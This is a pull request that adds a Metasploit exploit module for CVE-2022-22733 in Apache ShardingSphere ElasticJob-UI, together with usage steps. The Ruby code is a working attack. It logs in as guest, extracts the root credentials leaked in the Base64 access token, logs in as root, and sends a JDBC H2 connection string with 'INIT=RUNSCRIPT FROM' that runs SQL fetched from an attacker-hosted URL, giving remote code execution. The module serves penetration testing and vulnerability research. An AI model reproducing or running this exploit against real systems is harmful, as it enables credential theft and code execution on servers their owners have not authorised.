### PR TITLE
Create apache_shardingsphere_cve_2022_22733.rb

### DIFF
--- a/modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb
+++ b/modules/exploits/multi/http/apache_shardingsphere_cve_2022_22733.rb
@@ -1,0 +1,149 @@
+require 'msf/core'
+require 'net/http'
+require 'openssl'
+require 'uri'
+require 'json'
+require 'base64'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apache ShardingSphere ElasticJob-UI CVE-2022-22733 Exploit',
+      'Description'    => %q{
+        This module exploits a vulnerability in Apache ShardingSphere ElasticJob-UI known as CVE-2022-22733.
+      },
+      'Author'         => [ 'Zeyad Azima' ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2022-22733' ],
+          ['URL', 'https://www.vicarius.io/vsociety/blog/unique-exploit-cve-2022-22733-privilege-escalation-and-rce'],
+          ['URL', 'https://www.vicarius.io/vsociety/blog/cve-2022-22733-apache-shardingsphere-elasticjob-ui-privilege-escalation'],
+        ],
+      'DefaultOptions' =>
+        {
+          'RPORT' => 8088,
+          'SSL'   => false,
+          'DisablePayloadHandler' => true
+        },
+      'Platform'       => ['win', 'linux'],
+      'Targets'        => [ [ 'Automatic', {} ] ],
+      'DisclosureDate' => '2022-01-20',
+      'DefaultTarget'  => 0
+      ))
+
+    register_options(
+      [
+        OptString.new('USERNAME', [ true, 'The username to authenticate with', 'guest']),
+        OptString.new('PASSWORD', [ true, 'The password to authenticate with', 'guest']),
+        OptString.new('JDBC', [ true, 'Payload URL for JDBC Attack ex: http://ip:8000/poc.sql' ])
+      ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'HEAD',
+      'uri'    => '/api/login',
+    })
+
+    if res && res.code == 200
+      return Exploit::CheckCode::Detected
+    else
+      return Exploit::CheckCode::Safe
+    end
+  rescue ::Rex::ConnectionError
+    print_error("#{peer} - Connection failed")
+    return Exploit::CheckCode::Unknown
+  end
+
+
+  def exploit
+    print_status('Attempting to authenticate...')
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => '/api/login',
+      'ctype'  => 'application/json',
+      'data'   => { 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }.to_json
+    })
+
+    unless res && res.code == 200
+      fail_with(Failure::NoAccess, 'Authentication failed')
+    end
+
+    json_res = JSON.parse(res.body)
+    access_token = json_res['model']['accessToken']
+    decoded_access_token = Base64.decode64(access_token)
+    decoded_json = JSON.parse(decoded_access_token)
+
+    root_username = decoded_json['rootUsername']
+    root_password = decoded_json['rootPassword']
+    print_good('Authenticated Successfully')
+    print_status("Root username: #{root_username}")
+    print_status("Root password: #{root_password}")
+
+    print_status('Attempting to authenticate with root credentials...')
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => '/api/login',
+    'ctype'  => 'application/json',
+    'data'   => { 'username' => root_username, 'password' => root_password }.to_json
+  })
+
+  unless res && res.code == 200
+    fail_with(Failure::NoAccess, 'Authentication with root credentials failed')
+  end
+
+  json_res = JSON.parse(res.body)
+    access_token = json_res['model']['accessToken']
+    decoded_access_token = Base64.decode64(access_token)
+    decoded_json = JSON.parse(decoded_access_token)
+
+    root_username = decoded_json['rootUsername']
+    root_password = decoded_json['rootPassword']
+
+
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => '/api/login',
+    'ctype'  => 'application/json',
+    'data'   => { 'username' => root_username, 'password' => root_password }.to_json
+  })
+
+  unless res && res.code == 200
+    fail_with(Failure::NoAccess, 'Authentication with root credentials failed')
+  end
+
+  json_res = JSON.parse(res.body)
+  root_access_token = json_res['model']['accessToken']
+  print_good('Authenticated with root credentials successfully')
+  print_status('Attempting JDBC attack...')
+
+  res = send_request_cgi({
+    'method' => 'POST',
+    'uri'    => '/api/data-source/connectTest',
+    'ctype'  => 'application/json',
+    'headers' => {
+      'Access-Token' => root_access_token
+    },
+    'data'   => { 'name' => 'azima', 'driver' => 'org.h2.Driver', 'url' => "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '#{datastore['JDBC']}'", 'username' => 'a', 'password' => 'a' }.to_json
+  })
+
+  unless res && res.code == 200
+    fail_with(Failure::UnexpectedReply, 'JDBC attack failed')
+  end
+
+  print_good('JDBC attack successful')
+rescue JSON::ParserError
+  fail_with(Failure::UnexpectedReply, 'Failed to parse the server\'s responses')
+rescue ::Rex::ConnectionError
+  fail_with(Failure::Unreachable, "#{peer} - Connection failed")
+end
+
+end


### PR DESCRIPTION
## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/multi/http/apache_shardingsphere_cve_2022_22733`
- [x] Start http server has your malicious sql file for JDBC attack.
- [x] `set RHOSTS target`
- [x] `set RPORT port`
- [x] `set JDBC url`
- [x] **Exploitation Blog** ([Here](https://www.vicarius.io/vsociety/blog/unique-exploit-cve-2022-22733-privilege-escalation-and-rce))

You can check out also a full analysis for the vulnerability from [Here](https://www.vicarius.io/vsociety/blog/cve-2022-22733-apache-shardingsphere-elasticjob-ui-privilege-escalation).
